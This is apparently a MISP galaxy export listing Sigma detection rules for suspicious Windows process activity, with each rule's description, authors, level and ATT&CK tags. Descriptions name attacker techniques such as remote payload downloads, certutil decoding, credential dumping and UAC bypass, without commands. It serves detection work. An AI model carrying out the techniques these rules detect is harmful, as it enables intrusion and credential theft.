tags ['attack.execution', 'attack.defense_evasion']

Suspicious Curl.EXE Download

Detects a suspicious curl process start on Windows that writes the requested document to a local file.

Internal MISP references

UUID e218595b-bbe7-4ee5-8a96-f32a24ad3468 which can be used as unique global reference for Suspicious Curl.EXE Download in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/07/03
falsepositive ['Unknown']
filename proc_creation_win_curl_susp_download.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']

Start Windows Service Via Net.EXE

Detects the usage of the "net.exe" command to start a service using the "start" flag

Internal MISP references

UUID 2a072a96-a086-49fa-bcb5-15cc5a619093 which can be used as unique global reference for Start Windows Service Via Net.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community
creation_date 2019/10/21
falsepositive ['Legitimate administrator or user executes a service for legitimate reasons.']
filename proc_creation_win_net_start_service.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1569.002']

Enumerate All Information With Whoami.EXE

Detects the execution of "whoami.exe" with the "/all" flag

Internal MISP references

UUID c248c896-e412-4279-8c15-1c558067b6fa which can be used as unique global reference for Enumerate All Information With Whoami.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/12/04
falsepositive ['Unknown']
filename proc_creation_win_whoami_all_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033', 'car.2016-03-001']

Diskshadow Script Mode - Uncommon Script Extension Execution

Detects execution of "Diskshadow.exe" in script mode to execute a script with a potentially uncommon extension. Initial baselining of the allowed extension list is required.

Internal MISP references

UUID 1dde5376-a648-492e-9e54-4241dd9b0c7f which can be used as unique global reference for Diskshadow Script Mode - Uncommon Script Extension Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/15
falsepositive ['False positive might occur with legitimate or uncommon extensions used internally. Initial baseline is required.']
filename proc_creation_win_diskshadow_script_mode_susp_ext.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Psexec Execution

Detects psexec execution where the user agreement is accepted on the command line.

Internal MISP references

UUID 730fc21b-eaff-474b-ad23-90fd265d4988 which can be used as unique global reference for Psexec Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author omkar72
creation_date 2020/10/30
falsepositive ['Administrative scripts.']
filename proc_creation_win_sysinternals_psexec_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1569', 'attack.t1021']

Suspicious RASdial Activity

Detects suspicious processes related to rasdial.exe.

Internal MISP references

UUID 6bba49bf-7f8c-47d6-a1bb-6b4dece4640e which can be used as unique global reference for Suspicious RASdial Activity in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author juju4
creation_date 2019/01/16
falsepositive ['False positives depend on scripts and administrative tools used in the monitored environment']
filename proc_creation_win_rasdial_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1059']

Suspicious New Service Creation

Detects creation of a new service via "sc" command or the powershell "new-service" cmdlet with suspicious binary paths

Internal MISP references

UUID 17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8 which can be used as unique global reference for Suspicious New Service Creation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/14
falsepositive ['Unlikely']
filename proc_creation_win_susp_service_creation.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.privilege_escalation', 'attack.t1543.003']

Exchange PowerShell Snap-Ins Usage

Detects the addition and use of Exchange PowerShell snap-ins to export mailbox data, as seen in use by HAFNIUM and APT27.

Internal MISP references

UUID 25676e10-2121-446e-80a4-71ff8506af47 which can be used as unique global reference for Exchange PowerShell Snap-Ins Usage in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author FPT.EagleEye, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/03/03
falsepositive ['Unknown']
filename proc_creation_win_powershell_snapins_hafnium.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001', 'attack.collection', 'attack.t1114']

Potential Persistence Attempt Via Existing Service Tampering

Detects the modification of an existing service in order to execute an arbitrary payload when the service is started or killed as a potential method for persistence.

Internal MISP references

UUID 38879043-7e1e-47a9-8d46-6bec88e201df which can be used as unique global reference for Potential Persistence Attempt Via Existing Service Tampering in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2020/09/29
falsepositive ['Unknown']
filename proc_creation_win_sc_service_tamper_for_persistence.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.persistence', 'attack.t1543.003', 'attack.t1574.011']

UAC Bypass Using DismHost

Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)

Internal MISP references

UUID 853e74f9-9392-4935-ad3b-2e8c040dae86 which can be used as unique global reference for UAC Bypass Using DismHost in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Christian Burkard (Nextron Systems)
creation_date 2021/08/30
falsepositive ['Unknown']
filename proc_creation_win_uac_bypass_dismhost.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.privilege_escalation', 'attack.t1548.002']

Compressed File Creation Via Tar.EXE

Detects execution of "tar.exe" in order to create a compressed file. Adversaries may abuse various utilities to compress or encrypt data before exfiltration.

Internal MISP references

UUID 418a3163-3247-4b7b-9933-dcfcb7c52ea9 which can be used as unique global reference for Compressed File Creation Via Tar.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), AdmU3
creation_date 2023/12/19
falsepositive ['Likely']
filename proc_creation_win_tar_compression.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.collection', 'attack.exfiltration', 'attack.t1560', 'attack.t1560.001']

Suspicious File Download From IP Via Wget.EXE - Paths

Detects potentially suspicious file downloads via Wget.exe directly from IP addresses, where the downloaded file is stored in a suspicious location.

Internal MISP references

UUID 40aa399c-7b02-4715-8e5f-73572b493f33 which can be used as unique global reference for Suspicious File Download From IP Via Wget.EXE - Paths in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2024/02/23
falsepositive ['Unknown']
filename proc_creation_win_wget_download_susp_locations.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious Plink Port Forwarding

Detects suspicious Plink tunnel port forwarding to a local port.

Internal MISP references

UUID 48a61b29-389f-4032-b317-b30de6b95314 which can be used as unique global reference for Suspicious Plink Port Forwarding in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/01/19
falsepositive ['Administrative activity using a remote port forwarding to a local port']
filename proc_creation_win_plink_port_forwarding.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1572', 'attack.lateral_movement', 'attack.t1021.001']

Write Protect For Storage Disabled

Detects applications trying to modify the registry in order to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.

Internal MISP references

UUID 75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13 which can be used as unique global reference for Write Protect For Storage Disabled in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Sreeman
creation_date 2021/06/11
falsepositive ['Unknown']
filename proc_creation_win_reg_write_protect_for_storage_disabled.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1562']

Uncommon Assistive Technology Applications Execution Via AtBroker.EXE

Detects the start of a non-built-in assistive technology application via "Atbroker.EXE".

Internal MISP references

UUID f24bcaea-0cd1-11eb-adc1-0242ac120002 which can be used as unique global reference for Uncommon Assistive Technology Applications Execution Via AtBroker.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Mateusz Wydra, oscd.community
creation_date 2020/10/12
falsepositive ['Legitimate, non-default assistive technology applications execution']
filename proc_creation_win_atbroker_uncommon_ats_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Renamed Visual Studio Code Tunnel Execution

Detects renamed Visual Studio Code tunnel execution. Attackers can abuse this functionality to establish a C2 channel

Internal MISP references

UUID 2cf29f11-e356-4f61-98c0-1bdb9393d6da which can be used as unique global reference for Renamed Visual Studio Code Tunnel Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/28
falsepositive ['Unknown']
filename proc_creation_win_vscode_tunnel_renamed_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071.001']

Verclsid.exe Runs COM Object

Detects when verclsid.exe is used to run a COM object via its GUID.

Internal MISP references

UUID d06be4b9-8045-428b-a567-740a26d9db25 which can be used as unique global reference for Verclsid.exe Runs COM Object in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename proc_creation_win_verclsid_runs_com.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Potentially Suspicious Regsvr32 HTTP IP Pattern

Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.

Internal MISP references

UUID 2dd2c217-bf68-437a-b57c-fe9fd01d5de8 which can be used as unique global reference for Potentially Suspicious Regsvr32 HTTP IP Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/11
falsepositive ['FQDNs that start with a number such as "7-Zip"']
filename proc_creation_win_regsvr32_http_ip_pattern.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.010']

Potential Product Class Reconnaissance Via Wmic.EXE

Detects the execution of WMIC in order to get a list of firewall and antivirus products

Internal MISP references

UUID e568650b-5dcd-4658-8f34-ded0b1e13992 which can be used as unique global reference for Potential Product Class Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community
creation_date 2023/02/14
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_product_class.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'car.2016-03-002']

Potential Arbitrary File Download Using Office Application

Detects potential arbitrary file download using a Microsoft Office application

Internal MISP references

UUID 4ae3e30b-b03f-43aa-87e3-b622f4048eed which can be used as unique global reference for Potential Arbitrary File Download Using Office Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
creation_date 2022/05/17
falsepositive ['Unknown']
filename proc_creation_win_office_arbitrary_cli_download.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']

Suspicious DumpMinitool Execution

Detects suspicious ways to use the "DumpMinitool.exe" binary

Internal MISP references

UUID eb1c4225-1c23-4241-8dd4-051389fde4ce which can be used as unique global reference for Suspicious DumpMinitool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/04/06
falsepositive ['Unknown']
filename proc_creation_win_dumpminitool_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1003.001']

Execution of Powershell Script in Public Folder

This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder

Internal MISP references

UUID fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4 which can be used as unique global reference for Execution of Powershell Script in Public Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2022/04/06
falsepositive ['Unlikely']
filename proc_creation_win_powershell_public_folder.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']

Use Short Name Path in Image

Detects use of the Windows 8.3 short name notation, which could be used as a method to avoid Image-based detection.

Internal MISP references

UUID a96970af-f126-420d-90e1-d37bf25e50e1 which can be used as unique global reference for Use Short Name Path in Image in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali
creation_date 2022/08/07
falsepositive ['Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process.']
filename proc_creation_win_susp_ntfs_short_name_path_use_image.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']

Fsutil Suspicious Invocation

Detects suspicious parameters of fsutil (deleting the USN journal, configuring it with a small size, etc.). This might be used by ransomware during an attack (seen with NotPetya and others).

Internal MISP references

UUID add64136-62e5-48ea-807e-88638d02df1e which can be used as unique global reference for Fsutil Suspicious Invocation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ecco, E.M. Anhaus, oscd.community
creation_date 2019/09/26
falsepositive ['Admin activity', 'Scripts and administrative tools used in the monitored environment']
filename proc_creation_win_fsutil_usage.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.impact', 'attack.t1070', 'attack.t1485']

Insensitive Subfolder Search Via Findstr.EXE

Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.

Internal MISP references

UUID 04936b66-3915-43ad-a8e5-809eadfd1141 which can be used as unique global reference for Insensitive Subfolder Search Via Findstr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/10/05
falsepositive ['Administrative or software activity']
filename proc_creation_win_findstr_subfolder_search.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.t1564.004', 'attack.t1552.001', 'attack.t1105']

Execute Pcwrun.EXE To Leverage Follina

Detects indirect command execution via the Program Compatibility Assistant "pcwrun.exe" leveraging the Follina (CVE-2022-30190) vulnerability.

Internal MISP references

UUID 6004abd0-afa4-4557-ba90-49d172e0a299 which can be used as unique global reference for Execute Pcwrun.EXE To Leverage Follina in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/13
falsepositive ['Unlikely']
filename proc_creation_win_lolbin_pcwrun_follina.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.execution']

Potential Reconnaissance Activity Via GatherNetworkInfo.VBS

Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs", which can be used to gather information about the target machine.

Internal MISP references

UUID 575dce0c-8139-4e30-9295-1ee75969f7fe which can be used as unique global reference for Potential Reconnaissance Activity Via GatherNetworkInfo.VBS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author blueteamer8699
creation_date 2022/01/03
falsepositive ['Administrative activity']
filename proc_creation_win_lolbin_gather_network_info.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.execution', 'attack.t1615', 'attack.t1059.005']

Potential PowerShell Execution Policy Tampering - ProcCreation

Detects changes to the PowerShell execution policy registry key made from the command line in order to bypass signing requirements for script execution.

Internal MISP references

UUID cf2e938e-9a3e-4fe8-a347-411642b28a9f which can be used as unique global reference for Potential PowerShell Execution Policy Tampering - ProcCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/11
falsepositive ['Unknown']
filename proc_creation_win_registry_set_unsecure_powershell_policy.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Renamed Sysinternals Sdelete Execution

Detects the use of a renamed Sysinternals SDelete; renaming the tool is something an administrator should not normally do.

Internal MISP references

UUID c1d867fe-8d95-4487-aab4-e53f2d339f90 which can be used as unique global reference for Renamed Sysinternals Sdelete Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/09/06
falsepositive ['System administrator usage']
filename proc_creation_win_renamed_sysinternals_sdelete.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1485']

Shell Process Spawned by Java.EXE

Detects a shell spawned from the Java host process, which could be a sign of exploitation (e.g. Log4j exploitation).

Internal MISP references

UUID dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0 which can be used as unique global reference for Shell Process Spawned by Java.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades), Nasreddine Bencherchali
creation_date 2021/12/17
falsepositive ['Legitimate calls to system binaries', 'Company specific internal usage']
filename proc_creation_win_java_susp_child_process_2.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.persistence', 'attack.privilege_escalation']

Permission Misconfiguration Reconnaissance Via Findstr.EXE

Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This is seen being used in combination with "icacls" to look for misconfigured file or folder permissions.

Internal MISP references

UUID 47e4bab7-c626-47dc-967b-255608c9a920 which can be used as unique global reference for Permission Misconfiguration Reconnaissance Via Findstr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/12
falsepositive ['Unknown']
filename proc_creation_win_findstr_recon_everyone.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.006']

Cloudflared Tunnel Execution

Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.

Internal MISP references

UUID 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4 which can be used as unique global reference for Cloudflared Tunnel Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/17
falsepositive ['Legitimate usage of Cloudflared tunnel.']
filename proc_creation_win_cloudflared_tunnel_run.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1102', 'attack.t1090', 'attack.t1572']

File Decoded From Base64/Hex Via Certutil.EXE

Detects the execution of certutil with either the "decode" or "decodehex" flag to decode base64- or hex-encoded files. This can be abused by attackers to decode an encoded payload before execution.

Internal MISP references

UUID cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7 which can be used as unique global reference for File Decoded From Base64/Hex Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
creation_date 2023/02/15
falsepositive ['Unknown']
filename proc_creation_win_certutil_decode.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']

Suspicious Child Process Created as System

Detects child processes spawned with SYSTEM privileges by parent processes running under the LOCAL SERVICE or NETWORK SERVICE accounts.

Internal MISP references

UUID 590a5f4c-6c8c-4f10-8307-89afe9453a9d which can be used as unique global reference for Suspicious Child Process Created as System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)
creation_date 2019/10/26
falsepositive ['Unknown']
filename proc_creation_win_susp_child_process_as_system_.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1134.002']

AADInternals PowerShell Cmdlets Execution - ProccessCreation

Detects AADInternals cmdlet execution. AADInternals is a tool for administering Azure AD and Office 365, which can be abused by threat actors to attack Azure AD or Office 365.

Internal MISP references

UUID c86500e9-a645-4680-98d7-f882c70c1ea3 which can be used as unique global reference for AADInternals PowerShell Cmdlets Execution - ProccessCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/23
falsepositive ['Legitimate use of the library for administrative activity']
filename proc_creation_win_powershell_aadinternals_cmdlets_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.reconnaissance', 'attack.discovery', 'attack.credential_access', 'attack.impact']

Remote Access Tool - Team Viewer Session Started On Windows Host

Detects the command line executed when TeamViewer starts a session initiated by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.

Internal MISP references

UUID ab70c354-d9ac-4e11-bbb6-ec8e3b153357 which can be used as unique global reference for Remote Access Tool - Team Viewer Session Started On Windows Host in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Josh Nickels, Qi Nan
creation_date 2024/03/11
falsepositive ['Legitimate usage of TeamViewer']
filename proc_creation_win_remote_access_tools_teamviewer_incoming_connection.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.t1133']

Suspicious TSCON Start as SYSTEM

Detects a tscon.exe start as LOCAL SYSTEM.

Internal MISP references

UUID 9847f263-4a81-424f-970c-875dab15b79b which can be used as unique global reference for Suspicious TSCON Start as SYSTEM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/03/17
falsepositive ['Unknown']
filename proc_creation_win_tscon_localsystem.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']

Process Memory Dump Via Dotnet-Dump

Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential memory dumping of critical processes such as LSASS.

Internal MISP references

UUID 53d8d3e1-ca33-4012-adf3-e05a4d652e34 which can be used as unique global reference for Process Memory Dump Via Dotnet-Dump in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/14
falsepositive ['Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated']
filename proc_creation_win_lolbin_dotnet_dump.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']

Potential Discovery Activity Via Dnscmd.EXE

Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones are used to host the DNS records for a particular domain.

Internal MISP references

UUID b6457d63-d2a2-4e29-859d-4e7affc153d1 which can be used as unique global reference for Potential Discovery Activity Via Dnscmd.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @gott_cyber
creation_date 2022/07/31
falsepositive ['Legitimate administration use']
filename proc_creation_win_dnscmd_discovery.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.execution', 'attack.t1543.003']

Suspicious Dump64.exe Execution

Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder.

Internal MISP references

UUID 129966c9-de17-4334-a123-8b58172e664d which can be used as unique global reference for Suspicious Dump64.exe Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger, Florian Roth
creation_date 2021/11/26
falsepositive ['Dump64.exe in other folders than the excluded one']
filename proc_creation_win_lolbin_dump64.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']

Suspicious Cmdl32 Execution

Detects use of the LOLBAS binary Cmdl32 to download a payload in order to evade antivirus.

Internal MISP references

UUID f37aba28-a9e6-4045-882c-d5004043b337 which can be used as unique global reference for Suspicious Cmdl32 Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/03
falsepositive ['Unknown']
filename proc_creation_win_lolbin_cmdl32.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218', 'attack.t1202']

PUA - CsExec Execution

Detects the use of the lesser-known remote execution tool CsExec, a PsExec alternative.

Internal MISP references

UUID d08a2711-ee8b-4323-bdec-b7d85e892b31 which can be used as unique global reference for PUA - CsExec Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/22
falsepositive ['Unknown']
filename proc_creation_win_pua_csexec.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.resource_development', 'attack.t1587.001', 'attack.execution', 'attack.t1569.002']

Windows Credential Manager Access via VaultCmd

Detects listing of the credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe.

Internal MISP references

UUID 58f50261-c53b-4c88-bd12-1d71f12eda4c which can be used as unique global reference for Windows Credential Manager Access via VaultCmd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/08
falsepositive ['Unknown']
filename proc_creation_win_vaultcmd_list_creds.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1555.004']

Suspicious Child Process Of SQL Server

Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.

Internal MISP references

UUID 869b9ca7-9ea2-4a5a-8325-e80e62f75445 which can be used as unique global reference for Suspicious Child Process Of SQL Server in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author FPT.EagleEye Team, wagga
creation_date 2020/12/11
falsepositive No established falsepositives
filename proc_creation_win_mssql_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1505.003', 'attack.t1190', 'attack.initial_access', 'attack.persistence', 'attack.privilege_escalation']

Remote Access Tool - ScreenConnect Server Web Shell Execution

Detects potential web shell execution from the ScreenConnect server process.

Internal MISP references

UUID b19146a3-25d4-41b4-928b-1e2a92641b1b which can be used as unique global reference for Remote Access Tool - ScreenConnect Server Web Shell Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jason Rathbun (Blackpoint Cyber)
creation_date 2024/02/26
falsepositive ['Unlikely']
filename proc_creation_win_remote_access_tools_screenconnect_webshell.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.t1190']

WSL Child Process Anomaly

Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections, or persistence attempts via cron using WSL.

Internal MISP references

UUID 2267fe65-0681-42ad-9a6d-46553d3f3480 which can be used as unique global reference for WSL Child Process Anomaly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/23
falsepositive ['Unknown']
filename proc_creation_win_wsl_child_processes_anomalies.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218', 'attack.t1202']

Mstsc.EXE Execution With Local RDP File

Detects a potential RDP connection via Mstsc using a local ".rdp" file.

Internal MISP references

UUID 5fdce3ac-e7f9-4ecd-a3aa-a4d78ebbf0af which can be used as unique global reference for Mstsc.EXE Execution With Local RDP File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Christopher Peacock @securepeacock
creation_date 2023/04/18
falsepositive ['Likely with legitimate usage of ".rdp" files']
filename proc_creation_win_mstsc_run_local_rdp_file.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']

HackTool - SILENTTRINITY Stager Execution

Detects SILENTTRINITY stager use via PE metadata.

Internal MISP references

UUID 03552375-cc2c-4883-bbe4-7958d5a980be which can be used as unique global reference for HackTool - SILENTTRINITY Stager Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aleksey Potapov, oscd.community
creation_date 2019/10/22
falsepositive ['Unlikely']
filename proc_creation_win_hktl_silenttrinity_stager.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071']

Computer System Reconnaissance Via Wmic.EXE

Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.

Internal MISP references

UUID 9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f which can be used as unique global reference for Computer System Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/08
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_computersystem.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.execution', 'attack.t1047']

Always Install Elevated Windows Installer

Detects the Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privileges.

Internal MISP references

UUID cd951fdc-4b2f-47f5-ba99-a33bf61e3770 which can be used as unique global reference for Always Install Elevated Windows Installer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
creation_date 2020/10/13
falsepositive ['System administrator usage', 'Anti virus products', 'WindowsApps located in "C:\Program Files\WindowsApps\"']
filename proc_creation_win_susp_always_install_elevated_windows_installer.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1548.002']

File Download From Browser Process Via Inline URL

